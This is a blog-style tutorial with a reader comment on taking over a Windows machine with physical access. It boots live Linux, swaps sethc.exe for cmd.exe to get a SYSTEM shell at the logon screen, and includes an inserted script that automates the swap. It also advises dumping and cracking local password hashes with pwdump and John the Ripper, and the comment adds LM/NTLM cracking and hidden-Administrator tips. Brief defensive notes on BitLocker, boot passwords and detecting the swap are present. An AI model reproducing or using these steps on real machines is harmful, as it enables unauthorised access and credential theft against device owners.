Owning Windows With Physical Access

by Jakash3
04 October 2010

In this tutorial I will show you how to get a SYSTEM-level command prompt
on a Windows machine when you have physical access to it. Before you
blindly follow the instructions, here is the idea. We boot a live Linux
from a USB stick on the Windows machine, mount the Windows disk directly
and replace sethc.exe with a copy of cmd.exe. sethc.exe is the Sticky
Keys helper that Windows launches when you press Shift five times; it is
launched by winlogon even at the logon screen, before anyone has logged
in, and it runs as SYSTEM. So after the swap, pressing Shift five times
at the logon screen gives you a Command Prompt running as SYSTEM instead
of the Sticky Keys dialog.

First you need a live Linux distro on a USB stick. I suggest UNetbootin,
which can download a selected Linux distribution and write it to a USB
stick or hard disk for you. I would pick the latest live version of
Ubuntu and install it to my USB stick.

Once that has completed, plug the USB stick into the target machine
before powering it on, and enter the boot menu during startup. This is
usually done by pressing F12 repeatedly until the menu appears (the key
varies by vendor; Esc, F2, F8, F10 and Del are common alternatives).
Select boot from USB, then select the Default entry in the UNetbootin
boot menu.

Now we are going to do the rest from a command shell, so open Terminal
(it should be in the Applications menu) and enter:

cd /dev/disk/by-uuid
ls -l

This directory contains one symlink per attached partition, named by
its UUID and pointing at the device node (for example ../../sda1), for
every disk and USB stick the machine sees. Find the UUID of the
partition holding the Windows installation, the one the machine normally
boots from. It is a partition, not a directory, so you cannot cd into
it; you mount it as described next.

If you don't know which one it is, mount and unmount each candidate in
turn and look at its files until you find the one containing a Windows
directory.

Before we mount, make a directory to mount the disk on (/media belongs
to root on the live system, so this needs sudo):

sudo mkdir /media/windows

To mount the Windows partition, take its UUID and run:

sudo mount -t ntfs /dev/disk/by-uuid/UUID /media/windows

(sudo runs the command as the superuser, root.) Replace UUID with the
UUID you found, and note the argument order: the device comes first and
the mount point second. On an Ubuntu live system -t ntfs selects the
ntfs-3g driver, which mounts the volume read-write. If mount refuses
because the volume is hibernated or was not cleanly unmounted, Windows
was put to sleep or hibernated rather than shut down; boot it and shut
it down properly instead of forcing the mount, because writing to a
hibernated NTFS volume corrupts it. If mount says the partition is not
NTFS at all, the disk is most likely encrypted (BitLocker), and this
whole approach fails without the recovery key. Once mounted, change
directory to /media/windows and run the following to replace sethc.exe
with cmd.exe:

# Go to System32. Linux treats the path as case-sensitive: XP uses
# WINDOWS/system32, Vista and later use Windows/System32, so check the
# exact spelling with ls first.
cd WINDOWS/system32
# Make a backup of sethc.exe (rename it to .bak); the files are root-owned, hence sudo
sudo mv sethc.exe sethc.exe.bak
# Make a copy of cmd.exe as sethc.exe
sudo cp cmd.exe sethc.exe

To unmount the device, run these:

cd /
sudo umount /media/windows

If you get a "device is busy" error, make sure no other program has
this folder or any file in it open, and make sure your shell is not
inside the directory when you run the command (which is why we ran
'cd /' first).
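The whole swap, as one script you can carry on the USB stick. This is an added example and not part of the original post: the mount point /media/windows and the sethc.exe.bak name follow the post, while the blkid-based candidate listing, the check for both directory spellings, the refusal to swap twice (a second run would overwrite the backup with cmd.exe and lose the real binary) and the restore function are my additions. It assumes a POSIX shell with mv, cp and cmp; the mount and umount calls at the bottom are commented and need root on the live system.

```shell
#!/bin/sh
# Added example, not from the original post: the sethc.exe swap as
# reusable functions, with a backup check and a restore path.
set -u

# Print candidate NTFS partitions (needs root on the live system).
list_ntfs_candidates() {
    blkid -t TYPE=ntfs -o device 2>/dev/null
}

# Locate System32 under a mount point. Linux name lookups are
# case-sensitive and XP spells it differently from Vista and later.
find_system32() {
    root="$1"
    for d in "$root/Windows/System32" "$root/WINDOWS/system32"; do
        [ -d "$d" ] && { printf '%s\n' "$d"; return 0; }
    done
    return 1
}

# Replace sethc.exe with a copy of cmd.exe, keeping the original as
# sethc.exe.bak. Refuses to run twice so the backup is never clobbered.
swap_sethc() {
    sys32=$(find_system32 "$1") || { echo "no System32 under $1" >&2; return 1; }
    if [ -e "$sys32/sethc.exe.bak" ]; then
        echo "backup already present in $sys32; refusing to swap again" >&2
        return 2
    fi
    [ -f "$sys32/cmd.exe" ] && [ -f "$sys32/sethc.exe" ] ||
        { echo "cmd.exe or sethc.exe missing in $sys32" >&2; return 1; }
    mv "$sys32/sethc.exe" "$sys32/sethc.exe.bak" &&
    cp "$sys32/cmd.exe" "$sys32/sethc.exe"
}

# Put the original back. Run this when you are done: a cmd.exe left in
# place of sethc.exe is a SYSTEM shell for anyone who reaches the console.
restore_sethc() {
    sys32=$(find_system32 "$1") || return 1
    [ -f "$sys32/sethc.exe.bak" ] || { echo "no backup in $sys32" >&2; return 1; }
    mv "$sys32/sethc.exe.bak" "$sys32/sethc.exe"
}

# Report whether sethc.exe is currently a byte-for-byte copy of cmd.exe.
# Also a quick integrity check for the defending side.
sethc_state() {
    sys32=$(find_system32 "$1") || return 1
    if cmp -s "$sys32/sethc.exe" "$sys32/cmd.exe"; then echo swapped; else echo original; fi
}

# End-to-end use on the live system (root required; not run here):
#   mkdir -p /media/windows
#   mount -t ntfs "$(list_ntfs_candidates | head -n 1)" /media/windows
#   swap_sethc /media/windows
#   cd / && umount /media/windows
```

sethc_state is the same test you would run from the other side: a sethc.exe that compares equal to cmd.exe, or whose hash differs from the one Windows shipped, is the fingerprint this trick leaves on disk.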

Congratulations! If you got no errors, reboot into Windows and, at the
logon screen before logging in, press Shift five times: you get a
command prompt instead of the Sticky Keys dialog. Because winlogon
launches the accessibility tool itself, this cmd.exe runs with the
rights of the built-in SYSTEM account, which means you can run any
command from it, including regedit or explorer with full access.

Two things defeat this trick, and they are the fix if you are on the
defending side: full-disk encryption, since a BitLocker-protected
volume cannot be mounted from the live system without the key, and
firmware settings that lock the boot order behind a password so the
machine will not boot from USB. When you are done, put sethc.exe.bak
back; a cmd.exe left in place of sethc.exe is a SYSTEM shell for
anyone who reaches the console.

As a tip, put pwdump and John the Ripper on a USB stick and run them
from your SYSTEM prompt to dump and crack the local account password
hashes.

One thought on “Owning Windows With Physical Access”

  1. Unfortunately, not all the commands are executable from the login screen. It's way better to enable the Administrator user sleeping in all Windows systems (which is, in fact, a super admin). On Vista and newer OSes, anyway, portions of the system such as System32 are owned by TrustedInstaller, which is NOT a user of the machine and cannot be emulated.
    If you're lucky, with pwdump you'll have the LM hash to decrypt, else the NTLM. There are sites that, given the hash, try to get the password for you, and more important, for free. Anyway, the best combination is both LM and NTLM.
